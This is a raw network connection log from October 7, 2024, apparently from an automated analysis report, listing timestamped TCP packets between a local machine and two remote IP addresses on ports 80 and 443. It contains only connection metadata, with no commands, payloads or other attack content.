Oct 7, 2024 03:15:38.001374960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:38.001386881 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:38.001409054 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:38.001425028 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:38.001458883 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:38.078506947 CEST	443	49822	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.078654051 CEST	443	49822	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.078743935 CEST	49822	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.079027891 CEST	49822	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.079091072 CEST	443	49822	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.079128027 CEST	49822	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.079144001 CEST	443	49822	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.082214117 CEST	49827	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.082257986 CEST	443	49827	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.082562923 CEST	49827	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.082562923 CEST	49827	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.082602978 CEST	443	49827	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.116668940 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:38.121620893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:38.436330080 CEST	443	49823	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.436930895 CEST	49823	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.436958075 CEST	443	49823	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.437393904 CEST	49823	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.437398911 CEST	443	49823	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.502975941 CEST	443	49824	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.503490925 CEST	49824	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.503520012 CEST	443	49824	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.503743887 CEST	49824	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.503755093 CEST	443	49824	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.507179022 CEST	443	49825	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.507477999 CEST	49825	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.507520914 CEST	443	49825	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.507797003 CEST	49825	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.507808924 CEST	443	49825	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.535069942 CEST	443	49823	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.535221100 CEST	443	49823	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.535365105 CEST	49823	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.535424948 CEST	49823	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.535424948 CEST	49823	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.535450935 CEST	443	49823	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.535463095 CEST	443	49823	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.538551092 CEST	49828	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.538593054 CEST	443	49828	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.538678885 CEST	49828	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.538846016 CEST	49828	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.538856983 CEST	443	49828	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.540313959 CEST	443	49826	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.541444063 CEST	49826	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.541455984 CEST	443	49826	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.542109966 CEST	49826	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.542114973 CEST	443	49826	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.602550030 CEST	443	49824	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.602734089 CEST	443	49824	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.602801085 CEST	49824	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.603065014 CEST	49824	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.603080988 CEST	443	49824	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.603120089 CEST	49824	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.603126049 CEST	443	49824	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.606496096 CEST	49829	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.606587887 CEST	443	49829	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.606755018 CEST	49829	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.607059956 CEST	49829	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.607095003 CEST	443	49829	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.607120991 CEST	443	49825	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.607218027 CEST	443	49825	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.607280970 CEST	49825	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.607292891 CEST	443	49825	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.607321978 CEST	443	49825	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.607410908 CEST	49825	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.607438087 CEST	49825	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.607455015 CEST	443	49825	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.607466936 CEST	49825	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.607474089 CEST	443	49825	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.610553026 CEST	49830	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.610574961 CEST	443	49830	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.610652924 CEST	49830	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.611071110 CEST	49830	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.611095905 CEST	443	49830	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.639996052 CEST	443	49826	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.640149117 CEST	443	49826	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.640218973 CEST	49826	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.640259027 CEST	49826	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.640259027 CEST	49826	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.640274048 CEST	443	49826	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.640284061 CEST	443	49826	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.642793894 CEST	49831	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.642817020 CEST	443	49831	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.642879963 CEST	49831	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.643225908 CEST	49831	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.643237114 CEST	443	49831	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.724029064 CEST	443	49827	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.724632978 CEST	49827	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.724672079 CEST	443	49827	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.725214958 CEST	49827	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.725222111 CEST	443	49827	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.822129965 CEST	443	49827	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.822536945 CEST	443	49827	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.822618961 CEST	49827	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.822700977 CEST	49827	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.822730064 CEST	443	49827	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.822758913 CEST	49827	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.822774887 CEST	443	49827	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.826081991 CEST	49832	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.826131105 CEST	443	49832	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.826220989 CEST	49832	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.826361895 CEST	49832	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:38.826370001 CEST	443	49832	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:38.911436081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:38.911658049 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:39.017656088 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:39.022588015 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:39.182012081 CEST	443	49828	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.182691097 CEST	49828	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.182703018 CEST	443	49828	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.183275938 CEST	49828	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.183281898 CEST	443	49828	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.246850967 CEST	443	49829	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.247232914 CEST	49829	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.247294903 CEST	443	49829	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.247611046 CEST	49829	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.247623920 CEST	443	49829	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.256537914 CEST	443	49830	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.256779909 CEST	49830	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.256809950 CEST	443	49830	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.257086039 CEST	49830	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.257096052 CEST	443	49830	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.282458067 CEST	443	49828	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.282737970 CEST	443	49828	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.282794952 CEST	49828	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.282841921 CEST	49828	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.282859087 CEST	443	49828	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.282871962 CEST	49828	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.282880068 CEST	443	49828	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.286654949 CEST	49833	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.286763906 CEST	443	49833	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.286884069 CEST	49833	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.287043095 CEST	49833	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.287067890 CEST	443	49833	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.310688972 CEST	443	49831	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.311192036 CEST	49831	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.311203957 CEST	443	49831	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.311696053 CEST	49831	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.311701059 CEST	443	49831	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.344715118 CEST	443	49829	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.344851971 CEST	443	49829	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.344899893 CEST	443	49829	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.344919920 CEST	49829	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.344970942 CEST	49829	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.348249912 CEST	49829	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.348285913 CEST	443	49829	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.348340988 CEST	49829	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.348360062 CEST	443	49829	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.351260900 CEST	49834	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.351295948 CEST	443	49834	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.351358891 CEST	49834	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.351499081 CEST	49834	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.351510048 CEST	443	49834	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.356254101 CEST	443	49830	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.356404066 CEST	443	49830	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.356487989 CEST	49830	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.356616974 CEST	49830	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.356617928 CEST	49830	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.356641054 CEST	443	49830	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.356662035 CEST	443	49830	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.358630896 CEST	49835	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.358676910 CEST	443	49835	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.358737946 CEST	49835	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.358867884 CEST	49835	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.358885050 CEST	443	49835	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.412834883 CEST	443	49831	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.413105011 CEST	443	49831	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.413172960 CEST	49831	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.413311958 CEST	49831	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.413331032 CEST	443	49831	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.413342953 CEST	49831	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.413350105 CEST	443	49831	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.415709019 CEST	49836	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.415745974 CEST	443	49836	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.415810108 CEST	49836	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.417201042 CEST	49836	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.417220116 CEST	443	49836	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.471487045 CEST	443	49832	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.472280025 CEST	49832	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.472346067 CEST	443	49832	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.472568035 CEST	49832	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.472584963 CEST	443	49832	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.570725918 CEST	443	49832	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.570888042 CEST	443	49832	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.570949078 CEST	49832	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.571115017 CEST	49832	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.571129084 CEST	443	49832	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.571141958 CEST	49832	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.571147919 CEST	443	49832	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.574728966 CEST	49837	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.574774027 CEST	443	49837	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.574839115 CEST	49837	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.575006008 CEST	49837	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.575021029 CEST	443	49837	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.775851011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:39.775938988 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:39.928410053 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:39.933259964 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:39.935683012 CEST	443	49833	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.936199903 CEST	49833	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.936291933 CEST	443	49833	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.936774015 CEST	49833	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.936789036 CEST	443	49833	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.991693020 CEST	443	49834	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.992589951 CEST	49834	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.992626905 CEST	443	49834	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:39.993134975 CEST	49834	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:39.993144989 CEST	443	49834	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.027343035 CEST	443	49835	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.039578915 CEST	443	49833	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.039653063 CEST	443	49833	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.039735079 CEST	49833	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.039762974 CEST	443	49833	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.039793968 CEST	443	49833	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.039849043 CEST	49833	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.040747881 CEST	49835	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.040779114 CEST	443	49835	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.041395903 CEST	49835	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.041402102 CEST	443	49835	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.041565895 CEST	49833	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.041618109 CEST	443	49833	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.041645050 CEST	49833	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.041659117 CEST	443	49833	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.044322014 CEST	49838	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.044370890 CEST	443	49838	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.044447899 CEST	49838	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.044604063 CEST	49838	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.044617891 CEST	443	49838	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.086055994 CEST	443	49836	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.088135958 CEST	49836	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.088190079 CEST	443	49836	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.088629961 CEST	49836	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.088635921 CEST	443	49836	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.093691111 CEST	443	49834	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.093987942 CEST	443	49834	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.094074965 CEST	49834	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.094244957 CEST	49834	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.094271898 CEST	443	49834	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.094294071 CEST	49834	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.094305992 CEST	443	49834	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.097019911 CEST	49839	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.097054958 CEST	443	49839	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.097155094 CEST	49839	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.097434998 CEST	49839	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.097445965 CEST	443	49839	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.140280008 CEST	443	49835	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.140341997 CEST	443	49835	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.140444994 CEST	443	49835	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.140522957 CEST	49835	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.140542984 CEST	49835	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.140724897 CEST	49835	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.140744925 CEST	443	49835	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.140759945 CEST	49835	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.140773058 CEST	443	49835	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.143598080 CEST	49840	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.143639088 CEST	443	49840	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.143721104 CEST	49840	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.143882036 CEST	49840	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.143898010 CEST	443	49840	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.188710928 CEST	443	49836	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.188863993 CEST	443	49836	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.189079046 CEST	49836	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.189186096 CEST	49836	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.189203024 CEST	443	49836	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.189215899 CEST	49836	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.189223051 CEST	443	49836	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.192015886 CEST	49841	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.192073107 CEST	443	49841	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.192291021 CEST	49841	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.192449093 CEST	49841	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.192468882 CEST	443	49841	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.221312046 CEST	443	49837	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.224724054 CEST	49837	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.224746943 CEST	443	49837	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.225047112 CEST	49837	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.225053072 CEST	443	49837	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.320961952 CEST	443	49837	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.321033001 CEST	443	49837	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.321149111 CEST	443	49837	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.321224928 CEST	49837	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.321249962 CEST	49837	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.321373940 CEST	49837	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.321393967 CEST	443	49837	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.321405888 CEST	49837	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.321413040 CEST	443	49837	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.324487925 CEST	49842	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.324542999 CEST	443	49842	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.324661016 CEST	49842	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.324805975 CEST	49842	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.324815035 CEST	443	49842	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.678911924 CEST	443	49838	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.679898977 CEST	49838	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.679944992 CEST	443	49838	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.680566072 CEST	49838	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.680576086 CEST	443	49838	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.689795971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:40.689883947 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:40.731153965 CEST	443	49839	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.732543945 CEST	49839	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.732563972 CEST	443	49839	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.733225107 CEST	49839	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.733231068 CEST	443	49839	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.777803898 CEST	443	49838	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.777875900 CEST	443	49838	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.778003931 CEST	49838	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.778520107 CEST	49838	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.778520107 CEST	49838	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.778544903 CEST	443	49838	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.778557062 CEST	443	49838	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.782438040 CEST	49843	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.782540083 CEST	443	49843	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.782988071 CEST	49843	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.783216000 CEST	49843	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.783252954 CEST	443	49843	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.792803049 CEST	443	49840	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.793349981 CEST	49840	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.793387890 CEST	443	49840	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.794101000 CEST	49840	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.794111967 CEST	443	49840	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.827611923 CEST	443	49841	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.828378916 CEST	49841	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.828402042 CEST	443	49841	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.828881979 CEST	49841	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.828887939 CEST	443	49841	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.830204964 CEST	443	49839	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.830229998 CEST	443	49839	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.830275059 CEST	443	49839	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:40.830291986 CEST	49839	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:40.830343008 CEST	49839	443	192.168.2.5	13.107.246.45
